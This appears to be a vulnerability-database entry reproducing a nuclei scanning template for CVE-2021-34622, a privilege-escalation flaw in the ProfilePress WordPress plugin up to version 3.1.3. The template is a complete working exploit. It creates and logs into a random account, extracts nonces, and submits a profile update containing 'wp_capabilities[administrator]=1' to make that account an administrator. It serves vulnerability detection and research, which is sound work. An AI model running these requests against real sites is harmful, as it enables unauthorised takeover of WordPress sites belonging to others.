Lucene search
K

WordPress ProfilePress <= 3.1.3 - Privilege Escalation

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 17 Views

ProfilePress for WordPress versions <=3.1.3 allows privilege escalation by authenticated users via arbitrary usermeta during profile updates.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-34622
5 Jul 202112:18
circl
CNNVD
WordPress 安全漏洞
7 Jul 202100:00
cnnvd
CNVD
WordPress ProfilePress plugin elevation of privilege vulnerability
9 Jul 202100:00
cnvd
CVE
CVE-2021-34622
7 Jul 202112:20
cve
Cvelist
CVE-2021-34622 ProfilePress 3.0 - 3.1.3 - Authenticated Privilege Escalation
7 Jul 202112:20
cvelist
EUVD
EUVD-2021-21272
7 Jul 202112:20
euvd
hivepro
Critical vulnerabilities found in WordPress plugin affecting 400,000 sites.
8 Jul 202115:12
hivepro
NVD
CVE-2021-34622
7 Jul 202113:15
nvd
OpenVAS
WordPress ProfilePress Plugin 3.0.0 < 3.1.4 Multiple Vulnerabilities
28 Sep 202100:00
openvas
OSV
CVE-2021-34622
7 Jul 202113:15
osv
Rows per page
id: CVE-2021-34622

info:
  name: WordPress ProfilePress <= 3.1.3 - Privilege Escalation
  author: Sourabh-Sahu
  severity: critical
  description: |
    ProfilePress plugin before 3.1.4 allows privilege escalation. Due to insufficient validation in the profile update functionality, authenticated users can supply arbitrary usermeta fields, including `wp_capabilities`, during profile updates. This enables a user to escalate their privileges to administrator.
  impact: |
    Authenticated users can escalate their privileges to administrator by supplying arbitrary usermeta fields during profile updates, leading to complete WordPress site takeover.
  remediation: |
    Upgrade to ProfilePress version 3.1.4 or later.
  reference:
    - https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-34622
  classification:
    cve-id: CVE-2021-34622
    epss-score: 0.0412
    epss-percentile: 0.89571
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cwe-id: CWE-269
    cpe: cpe:2.3:a:properfraction:profilepress:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: properfraction
    product: profilepress
    fofa-query: body="/wp-content/plugins/profilepress"
  tags: cve,cve2021,wordpress,wp-plugin,wp,profilepress,privilege-escalation,authenticated,intrusive,vkev,vuln

variables:
  username: "user_{{to_lower(rand_base(5))}}"
  password: "pass_{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"
  boundary: "WebKitFormBoundarypRyCNwmSkLdfNd7E"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary={{boundary}}
        Accept-Encoding: gzip

        --{{boundary}}
        Content-Disposition: form-data; name="reg_username"

        {{username}}
        --{{boundary}}
        Content-Disposition: form-data; name="reg_email"

        {{email}}
        --{{boundary}}
        Content-Disposition: form-data; name="reg_password"

        {{password}}
        --{{boundary}}
        Content-Disposition: form-data; name="reg_password_present"

        true
        --{{boundary}}
        Content-Disposition: form-data; name="reg_first_name"

        {{firstname}}
        --{{boundary}}
        Content-Disposition: form-data; name="reg_last_name"

        {{lastname}}
        --{{boundary}}
        Content-Disposition: form-data; name="action"

        pp_ajax_signup
        --{{boundary}}--

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=pp_ajax_login&data=login_username%3D{{username}}%26login_password%3D{{password}}%26login_form_id%3D1

  - raw:
      - |
        GET /account/edit-profile/ HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: wpnonce
        group: 1
        regex:
          - 'name="_wpnonce"\s+value="([^"]+)"'
          - "name='_wpnonce'\\s+value='([^']+)'"
        internal: true

      - type: regex
        name: nonce
        group: 1
        regex:
          - '"nonce"\s*:\s*"([^"]+)"'
          - 'pp_ajax_form\s*=\s*\{[^}]*"nonce"\s*:\s*"([^"]+)"'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary={{boundary}}
        Accept-Encoding: gzip

        --{{boundary}}
        Content-Disposition: form-data; name="reg_username"

        {{username}}
        --{{boundary}}
        Content-Disposition: form-data; name="eup_email"

        {{email}}
        --{{boundary}}
        Content-Disposition: form-data; name="eup_first_name"

        {{firstname}}
        --{{boundary}}
        Content-Disposition: form-data; name="eup_last_name"

        {{lastname}}
        --{{boundary}}
        Content-Disposition: form-data; name="eup_display_name"

        {{firstname}} {{lastname}}
        --{{boundary}}
        Content-Disposition: form-data; name="_wpnonce"

        {{wpnonce}}
        --{{boundary}}
        Content-Disposition: form-data; name="nonce"

        {{nonce}}
        --{{boundary}}
        Content-Disposition: form-data; name="ppmyac_form_action"

        updateProfile
        --{{boundary}}
        Content-Disposition: form-data; name="action"

        pp_ajax_editprofile
        --{{boundary}}
        Content-Disposition: form-data; name="is_melange"

        true
        --{{boundary}}
        Content-Disposition: form-data; name="wp_capabilities[administrator]"

        1
        --{{boundary}}--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'success":true'
          - 'Account was updated successfully'
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: dsl
        dsl:
          - 'email'
          - 'username'
          - 'password'
# digest: 4a0a0047304502201bf6f3c867d8b3617a1be04e69251d86450d309e082271351fad14e41e860b9f0221008faff11efd4cf5fdfdf754ccd15ce5d9a172be6ee3a17b011b45056007175b5c:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 26.5
CVSS 3.18.8 - 9.8
EPSS0.0412
SSVC
17